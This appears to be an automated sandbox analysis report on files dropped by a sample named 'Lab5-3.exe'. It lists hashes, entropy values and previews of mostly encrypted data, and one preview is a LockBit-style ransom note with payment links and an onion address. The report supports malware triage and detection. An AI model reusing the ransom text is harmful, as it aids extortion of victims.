                                                                                                          SHA-512:A39779E85623B88C86B3FA87EB95D50D6C6163DD41B0D40564131ED65E945280B61D29C1EE45D76A79822A7DE80D0B0CFC3F209FD6F3ED0A1366852AB96673E6
                                                                                                          Malicious:false
                                                                                                          Preview:=hNL.+.....R.'.[.aF..4<.d..j...~..!.v...k.xV....+.CK.v..."G.d..HT5K..c...B@..W.@...o.......m,..!J..0./......8..M.1.f...[.Q`oQ.e...bJ....] .x...S...}b}..'...^.. ../9...8..D.m.U..hV.L....G.<...7.L.....c............eA..l.....3.>..~.:.....j.:..t..\..v.k'W"...........+..;....0.=..Y.....D.(..W..s.f..|..P.6.....3U..V.........$...x%..t$bOv..kWw...}..?)U..ew..CV...Fj.<AA......$%asm!..v...... .9.......e...v...+ov..y[.E7.....J...Qf...[.`#...5.;5M.#4d....C...'4...u.<..{.rk....l;..>+..].O{...!`..D.(W...o..o.4.l...J....[D..,.Ri7..;L2. .....?m2HJcy5..1,..Gx}.5.).4..K2.nX;p..T.m...=!.....S.Z..Z...%s.Mt....I"..=...9.maUT.E$..N..|..&...d..tc)7#d.\..A>.Be*".....t_".).b.......0....o)..%|.<..\..'.6..A.k.go...l.....UCRs.R.dC.2Wt.).E..,........./....IK.qB...B\|.o..].......<..~...W.T3u....1{u.2Co.]J..r...Lz.w4>....(......A.....p4.....(M@M3.p..@..b>.}..*,S.%.w.@.,.6<..Yk..H/..G...(.HF.76T'....]..c....Dkt....R.J .."&F......o....=..{.....yqhI.Y.)....B...v.....1s;R
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3008
                                                                                                          Entropy (8bit):7.933078424161221
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:5A0s4Nn9XEojopzB+uajSEMD4DgOTf30CjXBFHfUTid3hBaUoSGFcmeykEdEElUJ:51jopzB+Lhj06wGx0uKeY2ElUJ
                                                                                                          MD5:984DEFACD37479EC12A1064A61F8F5E2
                                                                                                          SHA1:A54B5BBD7BA7D6F01C021F1BA94923C126361328
                                                                                                          SHA-256:42D51FE8D9D43F475DC0C44AA396B0276CF3B91C9D215350BA20648B7B9E27FC
                                                                                                          SHA-512:E2906AD359B54F95B920ACC9E97B5199B4981E04EFB9A469BDD376715C47633D2E13277D037BA5809DA8ACB368C1AD2B9FBFB8B11D10E5A6BFA0864F9DBE6448
                                                                                                          Malicious:false
                                                                                                          Preview:..k.....H}l.gx..x6..J.r...<..B.B?.0.mVE...A.w.8.~.0....G.....Q.(.......}......]..../t0..J'Bo"h:zH..C....3..;t.,.x.G..b..5...%4.zU...az...x..Y.Z.e.....i....)..N.!..;..k..[l.'.^C.jb......J...xG.^.k....e..)u..P...ud..>9.^...Az.:I..aS>.wkwwJZ-. t..FF}...O.N1..G....d..|a.Dk...c.X.5.......x..9e.... +.....Zp..fD....Rw.i^?.....^..\...q....94_i.........C.....R..,.....Rg\...W..9(M.g......8B..t..m#'im.-b...1*...20..R:..u.e...d..${.d+ra..4.TkTJ.WD...A:l.v7.._z.......1!.\Ct.g.....E......5....@.......I...%...%.3vm-..Jz.U.w.=M....g..e .`(.7.\n...q.u.....].-.\.......[.^G....."k\.X.....4...R.e.}........E....*....{..L..p.Z.q>.....UR.V7)R3"^D8.(.{.4a...x$..dU.Oh*.R....="a...J,...'.Xh.Y....k$%...o..4..Y.pC..sw9.......k...H.b.V.......=3.U...{u.c....^u.mh..>j..`....q...3.'.K0mJ. *.m.".C..uO..x...:.Jo."I...#.../..&tG(.q.p.4..8..].8.....m.E.?.OHC.\...{,qQV.Z.- .r,>|..7R..r2.......<('....`6.H3.o.d$..iKA.i]......T`.bA..3)..J.Fz.jHQC\.&.YZ...u.........:.!..Q.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3136
                                                                                                          Entropy (8bit):7.930305186320415
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:GFKGKx4VqWRERiCuRA4QuGx0uKeY2ElUJ:G0GKxrWRERXuRA4S0Cb
                                                                                                          MD5:A5FF89932A30BB483DD24310C56ECBB0
                                                                                                          SHA1:F27DFC73F6ACEA4C3FB3BE6816D7AD57DBF71DFB
                                                                                                          SHA-256:E6A7EEAB76AA951CCABC2B72BA40F668D239F38B148B782505B349C0D71C69AC
                                                                                                          SHA-512:9045A8BCF5DA48BCE5A921591A1CDB1E5EF0F636DAA7D94E8DF6B4B73098C95572132A66A33D577AC99C15E4E4617A3B4D5947C85AABE1CF1CFFDD143F44090A
                                                                                                          Malicious:false
                                                                                                          Preview:.&*Fw..BR....}.....(%........I...h*......u.r....[..c.....a@...A;...8X.Y.....Z.'gM..,...,..]._*[Jjd}N,.?..2r'.us.lB0F..s....U...].c..=...l.r .s..R.!E..j...9+(...6U.tM%Q.S.....]..l....w.....6..6.d. .Y-..c(|)......+7.:_g..d..&.SL...w.=...[..n.....G..M..B([...8wz..m...?..=.2h...)*...Y.....;...*..*....u.h.....j..(.j....G..R.N....L\gt.=gArQ=..vi...B_.?z.'.).vn..Q...A...%:pL....&.....k`@U..3h..........I......a..C..k!...Y.0.mir....A.B......"[U.:..D..R.....%H.Q..Hl.R>d..~g..0.;}.Z..,.....4.C1...H.'...v.....K..'l...1.I.7.NYG+v.33.RB..Q...E......|\.#.aS...<p..[S|~....`.s.~.,..F..&#.oG.I.."}...?.C..8M-..GR5.9....m;...:$B..m.t3..n..w......L..#..#m....-.....t.L.' .;.S2>.u.....;H......a...%...%.<.....V.?....g........'..+/....z3.. .......v?z.G.....&.{2d..gk.A.....dFz,..M.;YJ}v. ..OY`,lK.....8.:i......{ U.*x........'.[...]u......u'..~..t..g.0.*P}..........P..j}.4.qRs........t...,?.&.C._2..]..&.'..,:..d...G.I7_C..........O.`.;....C..wH....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):5280
                                                                                                          Entropy (8bit):7.96128344731491
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:YaG4m44pEXCbN1QLigZNEYi/MpxwWnwxi6jHLtm9DFcjbGg5GAGx0uKeY2ElUJ:Y14n4pbbQLJEr/qIHDL09DqWMS0Cb
                                                                                                          MD5:8A9D3E97D9F870045D1CC2163D3C84EB
                                                                                                          SHA1:1E4207D73ACA813C57F1B12882C0CA1758BAF564
                                                                                                          SHA-256:055111FC7FBCE33DF3911F16832BD143D3720111A88D571C7AA0A9687F5CA2BD
                                                                                                          SHA-512:4014A57EDB3AFA1D986CB71B76BAD7F909994E69EFA523F0C0A5A7F861D3CB8BC0104EBE690B8CF375832959546A256DCDD48210FD1F63554DAF3AC94F3FD912
                                                                                                          Malicious:false
                                                                                                          Preview:)....).f.a.....8|J.j..L....?.-...f.\?k....Q....H...S..`.>....HA2.....Gf#.A..4{..Xeo..x.U.......9....*<...*.<}N....`.....e....yA..cU..?....K]......w.'..p.3...9S5..nO.`.....'.L..R......I.....H..........,#h...Re....h.L..I{...>VR.....I........l..`w.....Efd..P.ST.a;Tz.....7.ie)...Jy..e.p.I.B..Da.d...'.m.f..Y.Oe$..V|...:.c..~..e.P=...z.-Z._.:0......].[As,S$......}A.,..VG.|y..)B.iz!.(.8^[PH.SG..kh~...B.|....n..2.e...i...K...4}...9..o..+.-...UF...uC..Id...[:.l...H.B..o...".>.D.....[...o....3..Vzzb.S.!..Cj..).o..I..o*.%Fa..t/..HVM....A3_h...`/.@..P"Jc. 4.K*RS.Sj.. ..WP..J..0j...nm.*..L...e......S.a...+.z+...N.t.............$.o.{.;.$....g.....+......3...._..K.....=....I...........ep.=_....AY/H...*.{....v..C.(...\.....e.Y...H~..3.{?J)......%...#H~c.QdH.....F...0....h.o...p.V.'..hr....{..{.x.O.~3..bn..a.]v..D5...9..Q.b,....o..kI....E.}}..k..S.C...s..O.L.......^...?b.l...8...w...%j..:G..i...2.[8..b..Rj2.i./.LE..j.....*.. .Yqt.<;..1z.:(J...!.m.......1.=}..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3808
                                                                                                          Entropy (8bit):7.955647251716854
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:LyKTjWwKsckKJPTXJaiGXZNKOMZoOGx0uKeY2ElUJ:Gk6wKHJTXJafvbJd0Cb
                                                                                                          MD5:652F3D24F8F6D7581996335B365B9F4A
                                                                                                          SHA1:B3AA83F52DB384BDFC55AFBCF5EF92C4D93F89E2
                                                                                                          SHA-256:2867FADDF453D208BF6937C48A114B18674A0E6FEAE0089E0B26EDD01C5E212F
                                                                                                          SHA-512:C898BD352440FC20DCC99D6FA8C54ACF0731AAD5CD0836309E9E6D797EF4B7D49BB5EDD695F7AC27BDDB22DA6F0CA7BE0CE9932467ED6F48EB4E0874F192CCC7
                                                                                                          Malicious:false
                                                                                                          Preview:......:.z.xT<...=uf....kt.Ld.Xx.Z1...7....]...vt.......O.;<...O..."P.<`......r.0.+(8,. ....7./9.....a.....[.dN.....:.2.w....$,......a...;.l.F.>.b...'S.U."n..A.u/....DS...........Kq....[`q..'........+..Bvz%x.....U+....`..H.U.....z.Sh./^.[.!.yg...W.GH*.,..|;U..0#...9..'(.(.N..j.rY.......6.`7 +.8`.t...$.T}_..B7...W).. .l....Rf.)...'..1"..Q..H.....y2.^LG.~.W.,..p..*.H..L.:2..C4p.!...+....-C`}}....,....6`.@j^.Vl.#dM.....+.5.i.....Z....a..X.1GB.........1....1..CQr..."......u{........(..>..rn&.3..k..o.b.Y.^#J.{.....->]....n(@..0ZG..k....L..{c1..t.T....-..{.Lp..rT&5....Q..S..-c..n.......x.........?P\...X$Hs4.f..~. ^H.#ar..A.HA.N.J0.V.e.R.....q......k.ho$e.D...=._.k.b.i ..V..PCw.d.E.+{..C..p..&..o.;.....^...ad...5.b...b..s./..1....u.is.........>O3,..$!...9......o..~.....C.1c.}].>..N......[.Q..... A.^.y.|.a>/.q.p.o(..c.&...Ogt.r......($....5z......$..~_P...;\.a.c..e.....ac..B[Uz../+......k..R.0...\)G...=."....T....'....D6z!A....l_.....C....i..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3520
                                                                                                          Entropy (8bit):7.94677607298355
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:s0JQf/XvRjdn8wo+6EvsmG8uW/+mGx0uKeY2ElUJ:s0SX/R5Z6gsmG/50Cb
                                                                                                          MD5:08BAF7DD838E365378EC2E45ABE06ECE
                                                                                                          SHA1:F088AAC51AC5F8C73D7CBBDCAD4AE0B6DDAAF6B1
                                                                                                          SHA-256:74A0A3675C0539ED2966AF2494749B38AD94CC2D7956BC2A39F51AFF2F223B5F
                                                                                                          SHA-512:8CC96B0CF165D0396D49B3792D5FF3C646F1B06DBB9A375259F641401BA33F1C8D57C6AB88466CED2AB1E11BF9D626C51086542FA35A1E55C18DFA0D002BDF3E
                                                                                                          Malicious:false
                                                                                                          Preview:1....../....CM.....L"..91&W.~.<..s"..F....Q...C..&..)w..a..6.9...qt.G.s,.~Tj'.......E.G..r....:....\.N..r....74..c?..\.H.[.........:xyS-(j..W.....p....u..Pr."....2.&..j....n......;0N...k..4n:..5..J.%..........R.D.)./..r.n.=.z..1.. .........Yv`..h3,..l..n.c..}>.pI...o/zQ4/..!....E_Y...M`.........i.s#...=j.c?.D.s....$o..N9<)...vy...F.....&.@9..H..~X...(.......R....G.w.|E..T+&...<Pu....^..^.b.2..h....SJ.A.c..N...j6....r3a...V..z....?.g..D......#.../.&..<..k.B....hOv....t.q.Q.....N.w....J..|.IR"X-.)=..L9.....4u...l3...r.y8.y...U.....{._...p,....Q..B3.9....<.dq..9X......hy.,,.^..s...~._7,.j....K._ .t....1....6h&2.+......y...9s}.....R.?>.(.....I..(N........N.I.....{.....8v...G..Hj2.D......fR.F..n......./4..Vd/.(7.0....4n.c=.#&^-.>..,i.%G?C..u.9...r.....?..#..8.ye.Q..g..&.1.X.|....../.....>T....&D.....B.S.=.....&...5&IXN~[g.C.)..........|h...j.....{m..q....x..z]!S...."_.f.Ps.....5....g.5.F.f.w(~%\N<w.5^....).RW.~.....nd.h.2 2.D....Rr......>.n.t
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):53248
                                                                                                          Entropy (8bit):7.996744957184007
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:pintAHS6TIHfV1b+xtJEtVDnshSWYxQ52K3Z:UnqHRT8fVd+xXEtVYsfQ5fZ
                                                                                                          MD5:9D726D88003AB2FE958E297FF3B3207C
                                                                                                          SHA1:E3A0580904007C8CC7308A10997BF5474FFC24FF
                                                                                                          SHA-256:84441B2985EF9EAFFF08A9544A40E3816520C8F3114B171B3D545796ABD53165
                                                                                                          SHA-512:44F4680C63B7D3D962097DC005780AA5E3CA305425876BA34C866858272A483EAB117E6D207CF72666749F206655087993B71E4F197551B9D88C552C3C8D64C2
                                                                                                          Malicious:true
                                                                                                          Preview:.7.1.N..z..q..1.6..K.w....b"....I.*_..{i{.....&-....}do.e.2...?6L..1G....<.._.p...t..... ..hJOVUg...-.6@..L(.b.a.E...H.v{..bh....Zl*=.'...~y.B.5....P..!..8N8...!..7..;|L.i?..v{0......f#.....z.%.cbP..d...O......JX.<.~|.[./S....D.B.\x.'.....j...M.!.!k.+...\..:6`;...k&s.a{..X/!..#7`..&G.!......i...sO..w..C..f.F0..H.\J.M...J..n".X..gY..cU...B.0..G]..[.$.8......O%...'.q.{~Aw....}.....:\{..s..W.zg..QP..)..;...]$.Wu%.9&y..f.(0.W..Zi.t.'0.N.....a.L0.lc.=T5.&..M.wY.#b..*Q.).X...K4L..8.{.J.xa....H."....Y..N..F.f.J.r.S.?....?0..u........Y}>.\....RT.../?.n.^.fmRm.]o..{...........~....pg3.S^%.6.5.../....y..AC..*......Sw8`...l..s.Jw.h...(..$^._#./....uge.d.....!Q.<..}r.f...p.d)s......0..Ue7.n.....].7.c.0..Y.....`...@..{`..s.J........m.L....._.*....)0.^./-.x.......)..:..R$6.._s.8...z."..qps7..r.M$..?~tJz........Z12.Z.0f......$.*....-.&1....U..m..t.b......j._v..".Cs..@{..m..T.'..u..R.?....=m...!i.....CC.._H.O..b..(..Q.......#|. ..?l..De..A1...H$..=rs....y....G)h...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):53296
                                                                                                          Entropy (8bit):7.996331976237526
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:a+DGWgEO6T9jaU/jnjJofE7y1KOj/qCZ9jjZ:RGWa6T9jlbaGygu9vZ
                                                                                                          MD5:88AC029961431D76BAFFD2FED32BDEB3
                                                                                                          SHA1:BC2D038F45238ABD8B3AD9D0D71A7237B3BBD826
                                                                                                          SHA-256:77C510B32831E3E9219021650C9A90AE0F4CCC56261E1F9F7CDBFDB60CCB1C22
                                                                                                          SHA-512:5D6B5B0CD57B8A4D897BF7216CA58EA84A3A6B20B01D576BF4458208F349B76455E07202F694FEB14D7C87B660F882BAEF4689D892D3D5921848A623B84B9597
                                                                                                          Malicious:false
                                                                                                          Preview:i.....=<...@r.x......3...N....B$..}|..3.K..)4...E..FJ............u.).$qG..2..}..E.`k.._kW ...k ..e..........]Q..b....zI...G...KC...:u.Z.....#Z...O....GPG......f.s..t.x..%...S...*..3.{...\...w.=u..=g:...-3.....k.f]D!.q3.Q.......G..(0........c..Z(....P..{c.i.5'....E........{6....^d&...MR.5.J-f.E.......M..Ac..T!..f-}.5..]?P...+.O.k.u....Gk.ht.b.. 0.....H}.<{.-..Z....I......I......0.N.?t..'........$....l...J..L...........l..B...S.,.....8.2..`.r...Aw.:..T.h...U...G!......%5+..o.H.~\l...f.X.....Y...1@...S..W.....w2.V.7N.%...W`..8...m.+Q.....Q......v...gqA&...1E...Q.i,xij......YQoj_...........U.....?..\.y..^G....s....U.x..aelx4.../vm...Vp...M...P.9.....-.h.gmC^.I.8.JOX.H&.i..BL..c.R..\......e<0..#....J4u.......*......*v#....V..+.[Y0.T.j.X....I.;..*.....3..p8q.......q;?_..#i+SJ.E.8.'...r.s]S.#VH...O..`.|.L..ZB}..D.?V........(g......'.2Q.8.5......T..+Be......4e6.+.......*.Mp.@..}...(....2,...ZwoX...:Wn..4.7.%...ao..;.....C.O1.c.Z]..Fc...}._..M:
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):53376
                                                                                                          Entropy (8bit):7.996864655760804
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:6VzKsWZSxfp1dT/5YXANebcFsA5iBnWbZ:UKTZALFRdeNAcBnwZ
                                                                                                          MD5:0568EE72CE81DCCD5E2AD06454A144F6
                                                                                                          SHA1:1BDA6E330836F2D142C7093B0D7336E09B02FF0A
                                                                                                          SHA-256:B7F2B0C2287850F65901AEA632C4EF98A6E903F6BA48033E801B68EAE99765E0
                                                                                                          SHA-512:C37694D6F7278443F3405BB4AA9E481569EF30DFA952EDF83057BEE1F24114D2924983806D513633731CA48A95AF6F7428EF87AEE6269A440E13A63574A373CF
                                                                                                          Malicious:false
                                                                                                          Preview: #.........3.xjg]...hnW.[... W.Q....+4.y...J!w..P...v.....(;S$..\...3..).kCaLW..%.?,.p1....UgKl...W.C.R.............o........U.F..T.p...g..h..9.....n.Ug..%...i.P...-...N....6..}..eF.K....a..2.......n...5..,~...?m..S{............\...HcC.Q_X.m.q)..5.....j.f.a#d.]p.Wm5'..f.*..Q.&.{.Z..{...Hf.<V.....R......]0.X..YG.G....0.....|..5.%.q.c.w.?|.e3.0..[...m.N%.v.A.R..z..^...ZP........<Q.U8.dN..G......>H~......N.e[.....-~.A.eV....j. i;:a.\.a7.s..v1. .J,..G......ee...ZY@.O.JZG.4..c/l:!4...d2U.f......&.m......[......)....X..t.^m...m7s.M.F.:,.cv...v...I]!.[c....|m..m.0l,Z.q..bh.#.....).....BM...W.....O.....?.iJh..&......b.1...^N..!.._E.6\s....O2...^.O...B.............g0-.~.....:..68mU.O..KVS...i.bf..6.........].$..G..d.9.3|L........._...A.......hR%Z....3.]0.4......7.@...7..9..........t.4[...bK.X.T......L.v..}..7l..'......p..K.[.~q..V...Dy.......t.........'......./+:..NG.W...9........h]u...L4.'.F...A.?.xx.@.C,.l.Q}+.7..J+g.O&n.Q.+.2..3..&.....$_..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):53248
                                                                                                          Entropy (8bit):7.996499523290496
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:AR4ThQOwtzGMNpiTEK/vChMamCPNdo29DceUhQSMgvEVEL3lIrYZ:AR43qzGMNpGEYHadNF9DJUp82RIUZ
                                                                                                          MD5:BEC4E9F95F2FE089B018B1AD075E8853
                                                                                                          SHA1:4780C2555253074FA0324B03142D5C88191E8C1D
                                                                                                          SHA-256:8974A203B798F210646FEA1740337D414D545A0726D252DDD377A67E9E36016B
                                                                                                          SHA-512:36EC7D37DC311A1C9777E0EC4EA5E9EECBCC857B22022B1854E706C3A5C4EE1CD5F8A06418CF4F842337A7856FE55CB7B75A0F29ACF50493058E9D64F9C524C4
                                                                                                          Malicious:false
                                                                                                          Preview:<-9.f.....B.[.p..B..T..^..l2=}....3.1o9.o.(..^^U.6..}+..p......;bk.....PwXl...5`........U.K.!x..#.....C.j$...2}..x8..(K.c.....7.@4.e.1..@.....F;..p....v.VHjo.X.r.......`k.._H.../#<..q...z<........!(k9....).h..j.#.m. ...f.az+.......p.....^..Va.`H....,u....;\../~..A....<.<\..|...`......=......).....QIM5d..~......H.$...Q@\.$f.M.Y.Q...$.\.@....[(cL.5.6....t...u2..5]...U;...._yf2..'.8..`....ha<.lHl....u....^}....d..L........7.%U..Q....?..c.......U..8._.I2..k..<..........1O"A.......b.%...nR.H...Jz....q..i.w/.J%G.Q3.M...3..b.?... .@..L.....?..dx[.|.].^I.I.N........h".DC6......1^h.81c..Q{)l.........{.8...=..#4.~..T.+L~Y+eO#../.....sI.j. d=.....OI.2(..K;..../..".D|Z.D].N0...^.H.......A-&;...k..CX..f[ES@T...V-. ...%qPD..D.&.mn..5.n'...X.tA...X....F..F).....R.u.i.B.4..o...i..O...p.....J...p.(,.Mia.n.T....(.]5.}.U7.wSl.M.. H.K......'..r>'a/ .C...Xg..O..J...d.a-`.t.w.6EN...G..............g..1q..r....DZ.k.....[P......7.....m._N..4...#.I.`-F...]....k4..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):53296
                                                                                                          Entropy (8bit):7.996311788647635
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:JZZ692nCTwsOALyLMiKPGKylhCdhrTz6Jn+hhJeboqHjyRc0Z:gMnVm2AtPD+h8nsChocqH2G0Z
                                                                                                          MD5:7163FED194C12260ED1E422FE29B28F8
                                                                                                          SHA1:D3CBA65B782B5AED999BB84F0109E9B3A66A698F
                                                                                                          SHA-256:AFBEC2831C09C20842586E90D197DF2C2289A694EAA41488C02448DB1A745353
                                                                                                          SHA-512:10D7193D25A0006681EF59F2A046DB82566F3A2AC840F37322F79DC5ECC9DC184DC0357600FB95D90FDC6E5761E0CFC28C9E78955979C16DE1B3486B1351310D
                                                                                                          Malicious:false
                                                                                                          Preview:4.H.k..p....e.N..........2w..!..QM.H..og.Z..yP...........G`.j.H....4~.u.....E..'.).)i.....M:Q<.........R.UX..wg-...s..6.....gT..4.^..{j.t+.t.k....1.....^`.....[....8.:.;bMx..d7J.@.....4.}.?....`.rK4H..n...f..|.k.K-1...].....E.H.X.....n...U.~..\.....L.K.Jk.*V......y.e.p.L....Z...$.K..I.(.a<..+Z...P.9.~~.....EX8.~-.N..u.....4*_......<.i...........jP..-l.G.#A...X.3.u.r...n.ez.?:'....$..;..@...A)......\jW@p.H$...\..L..e.9(.m7fF..8<C...9......@..s.x...V......\..e..^z.oHF.....[..]..+..-!.c..Po..eR.zb2........G=..z.L....7........j.D+.N..R.:$..E.X`..T...2...Q.....h.I4j39...h....&... m......)..y..Y....34.sc.&.y*?V..j|...B.8..p}K...,..........N../. ..&>[@..x.Q..y.N.A....W....L.....q9..{/.J....BBB...9....\..f...C.....j.E).....n......f.h.K.&.4.L%8.0W.?[.x...uiu..t...N.)"[.!.M...BA]c...S.;M1%Z..k.`.w.;..oO$.]..7....tl.DEv..t.)+XA.d..df.O.J.....e...L.I..V/......O A.L+...AP.......&..%.y]......J.......v...E...8Xs_....D.<...%..:...f.+....;7.. ..h..l......@.;.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2992
                                                                                                          Entropy (8bit):7.937864963740463
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:P4Oi01m9qOfm0MmNzaNCSYAGemAnZbwHfUTid3hBaUoSGFcmeykEdEElU92i:qCm93haNCl5em41Gx0uKeY2ElUJ
                                                                                                          MD5:4387C996704F83D75A62F677EFFFA483
                                                                                                          SHA1:CA97AD1D7C66B97516F14B840A478DA9588618BD
                                                                                                          SHA-256:7321A3EE8B0D4A7630A38D190C83118B79F19DD43C4003F8B863949D06CC1CD8
                                                                                                          SHA-512:34D414B98C6CE36791F7191BC437876FB79F707AC6B927E4CF4D6CF197037817E8B0292D7ADD8C74421A47F6772468518CC1C67CD37F857ED346D17528161DCE
                                                                                                          Malicious:false
                                                                                                          Preview:...b[..4/u.8..k.$..h.J.....I ko.!e..G..p.v.m.'o..Q....X#v...TJ..3...Z3..@o<..L...d.q@....@..:.t_'c..qb}.=....2%~.=.%.<h}.a"O...1.b...9...pK.P,=2.V.K.o.7M......:...\.W7...h.....U.Z...P..l3.;.....Q..<.T.R...j.h'.@G..........!`.Y?o.T.:.......;.ZN#.iw.IbVU..c......O..r.W.rkq...~.......t..6Y.V.,.O*w.X...s..i.T.4<M%Y.. ..~.)....o.Q......Wa....?2;:S...}R........bG.|>.....O... .....,...D..;s...%...U.[.R...05nh..y....(....I@.&.I......}....Q=*...!3H..n.(.#.....E........#U(.#.B...".-9...3...".w'..].-..3..Q~I.~.>2..,.....lXQ....2..]....nUc.....:i/1......@i..D..~HZ......k.J...p..B..9...E..6..{..%R.g......&D.c...c.Y..Q.q...s....}T.Ka...-....N....MN.-...f/..(.;...Gt`..u.Q.ofO.9rY.):V7....M.<.t.x.H.3.vG.V2af.z..v....f.D.(..3.p.;..k8... ....G....."T.;..0.5^>ha..U...m].B.X2_....x.c;...`.I...g./3......v....f.........i.`.`.p..k~..p......S0o.|..Y...zU.......'...s.tE......=P?.t^3%>L.@..S/.i._.a|...Q.|1}.s....8..ZG...DR.y.0....n...[......|.+^.....[..G^(
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3168
                                                                                                          Entropy (8bit):7.930681714988476
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:XMmwbqqfEGbgD5+B4XQ1YIGx0uKeY2ElUJ:Xpo3bgDklYr0Cb
                                                                                                          MD5:5AD34F861205A528BF1F073C48090A78
                                                                                                          SHA1:82AF9E4A48C29312FE45788FE53FDD92D0CA3AD1
                                                                                                          SHA-256:76582EDC56CB34AEC85F2EDD5B46E90C60D21B25C0245E288534CB8B49D4F600
                                                                                                          SHA-512:588F6F006A023BE97164A2901BBF97F8288D70C28A4527CF02ED420801E758D35023AD9E4F15BEFD04295B4EF18A49D0BBB5A70C153FE490082E94C719E550F6
                                                                                                          Malicious:false
                                                                                                          Preview:(..W..}{....b..Y......L.....ES.V.|..?O......R..h.-.l./.t.pX.A;q..Y.D/..n...'.iO.1ep.g'...iD.......W#....].......y....a|+.[~/^.g....../....Bh.......V_.....<./........!@.........55..#.'[..*.'.6.....|.u.3L...A..&.{.;)..0......K...\..U...O...]=2c.i1D.....S>CM........O..cO.....e...m..O.l..}..(..1..yh.q4...'.]N9...;.nU..I..!1.t....B.|2o.....Z.......l.P..._..P....~.w5..'.....v.'.Wl...zr....8....B.?..[J......Z..o8.f.bR..R..$f..Y..r...W......{W..2........=I..zWG.R..`....,FN.{...U.[$S..d.iH....C(...#.^S..........&J..!ZCL..a..t9.,.rv...o./].T1CD@%.J..e.&r.f.u).......R.t.. .........F..}.8.)...[........0.c....'Fk_...J....i..).l.-'.#...t...P..d.}....h.....+...9Z+.c....\.I.!.).2...9R..O..+.F.m.$...gX..#Um...<{vYe..%.H=..C..7..E....|.I.U..Y..R............w...!...O.p....$m..Y.'B..?|d..8a....g.{.........|..i....nqM.f.4O....l...z.|fp......&.X..3.K|.i.......m..$..)..)Ao.....m.k..Ge....m.-.>...m8...A.!Co....<.Fe(...W^..:nhDq.>.T\......y....!....Cm2..c....F.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2720
                                                                                                          Entropy (8bit):7.922546887230118
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:8WJB/6ZABomIhlZD1nsb8h/GfxSHfUTid3hBaUoSGFcmeykEdEElU92i:8WuZABom07s4RGrGx0uKeY2ElUJ
                                                                                                          MD5:CF3A949EE5D99CEC26CA1637331CF040
                                                                                                          SHA1:89E9FDB32D5849D0C28A23157FA27250A2E54F0C
                                                                                                          SHA-256:7C56C7927CFC92F971BDE018F7AD43BBB3F946EB2F9F3227C025B40999CAEBED
